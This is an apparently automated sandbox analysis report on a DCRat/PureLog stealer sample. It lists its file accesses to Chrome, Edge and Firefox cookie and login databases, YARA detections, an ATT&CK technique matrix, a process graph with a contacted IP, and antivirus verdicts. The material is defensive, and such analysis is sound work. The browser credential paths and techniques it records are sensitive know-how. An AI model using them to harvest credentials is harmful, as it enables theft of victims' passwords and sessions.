                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal

                      Remote Access Functionality

                      barindex
                      Yara detected DCRat
                      Source: Yara matchFile source: Process Memory Space: 84JufgBTrA.exe PID: 5300, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 7112, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.1bb20000.19.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.1bb20000.19.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.133d4ac0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1886789398.000000001BB20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1841806382.0000000013369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Yara detected zgRAT
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.1bb20000.19.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.1bb20000.19.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.133d4ac0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1886789398.000000001BB20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting                      		Valid Accounts241
                      Windows Management Instrumentation                      		1
                      Scripting                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		2
                      File and Directory Discovery                      		1
                      Taint Shared Content                      		11
                      Archive Collected Data                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      DLL Side-Loading                      		11
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory144
                      System Information Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		1
                      Non-Application Layer Protocol                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt41
                      Registry Run Keys / Startup Folder                      		41
                      Registry Run Keys / Startup Folder                      		2
                      Obfuscated Files or Information                      		Security Account Manager341
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Clipboard Data                      		11
                      Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                      Software Packing                      		NTDS1
                      Process Discovery                      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets261
                      Virtualization/Sandbox Evasion                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      File Deletion                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items33
                      Masquerading                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job261
                      Virtualization/Sandbox Evasion                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                      Process Injection                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1511007 Sample: 84JufgBTrA.exe Startdate: 13/09/2024 Architecture: WINDOWS Score: 100 71 Suricata IDS alerts for network traffic 2->71 73 Antivirus detection for URL or domain 2->73 75 Antivirus detection for dropped file 2->75 77 13 other signatures 2->77 7 84JufgBTrA.exe 6 50 2->7         started        11 RuntimeBroker.exe 2 2->11         started        13 MaEiPrsQRasQLtRzJjb.exe 2 2->13         started        15 10 other processes 2->15 process3 dnsIp4 51 C:\Users\user\Desktop\zXYOSFcP.log, PE32 7->51 dropped 53 C:\Users\user\Desktop\yZwGwFNU.log, PE32 7->53 dropped 55 C:\Users\user\Desktop\xlsyLrRW.log, PE32 7->55 dropped 57 33 other malicious files 7->57 dropped 83 Creates an undocumented autostart registry key 7->83 85 Creates autostart registry keys with suspicious values (likely registry only malware) 7->85 87 Creates multiple autostart registry keys 7->87 99 3 other signatures 7->99 18 cmd.exe 7->18         started        20 csc.exe 4 7->20         started        24 powershell.exe 23 7->24         started        26 5 other processes 7->26 89 Antivirus detection for dropped file 11->89 91 Multi AV Scanner detection for dropped file 11->91 93 Machine Learning detection for dropped file 11->93 95 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 13->95 97 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 13->97 69 127.0.0.1 unknown unknown 15->69 file5 signatures6 process7 file8 28 MaEiPrsQRasQLtRzJjb.exe 18->28         started        45 3 other processes 18->45 49 C:\Windows\...\SecurityHealthSystray.exe, PE32 20->49 dropped 79 Infects executable files (exe, dll, sys, html) 20->79 33 conhost.exe 20->33         started        35 cvtres.exe 1 20->35         started        81 Loading BitLocker PowerShell Module 24->81 37 conhost.exe 24->37         started        39 WmiPrvSE.exe 24->39         started        41 conhost.exe 26->41         started        43 conhost.exe 26->43         started        47 2 other processes 26->47 signatures9 process10 dnsIp11 67 31.177.108.211, 49734, 49736, 56665 UNILINK-ASRU Russian Federation 28->67 59 C:\Users\user\Desktop\zmagdNkm.log, PE32 28->59 dropped 61 C:\Users\user\Desktop\yMEybVxl.log, PE32 28->61 dropped 63 C:\Users\user\Desktop\wtLyrQzn.log, PE32 28->63 dropped 65 23 other malicious files 28->65 dropped 101 Tries to harvest and steal browser information (history, passwords, etc) 28->101 file12 signatures13

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      84JufgBTrA.exe68%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      84JufgBTrA.exe100%AviraTR/Dropper.Gen
                      84JufgBTrA.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\Desktop\DvHnLgjG.log100%AviraTR/PSW.Agent.qngqt
                      C:\Recovery\RuntimeBroker.exe100%AviraTR/Dropper.Gen
                      C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe100%AviraTR/Dropper.Gen
                      C:\Users\user\Desktop\DNOFZBcI.log100%AviraHEUR/AGEN.1362695
                      C:\Users\user\AppData\Local\Temp\OO0he60sKA.bat100%AviraBAT/Delbat.C
                      C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe100%AviraTR/Dropper.Gen
                      C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe100%AviraTR/Dropper.Gen
                      C:\Users\user\Desktop\DvHnLgjG.log100%Joe Sandbox ML
                      C:\Recovery\RuntimeBroker.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe100%Joe Sandbox ML
                      C:\Users\user\Desktop\DNOFZBcI.log100%Joe Sandbox ML
                      C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe100%Joe Sandbox ML
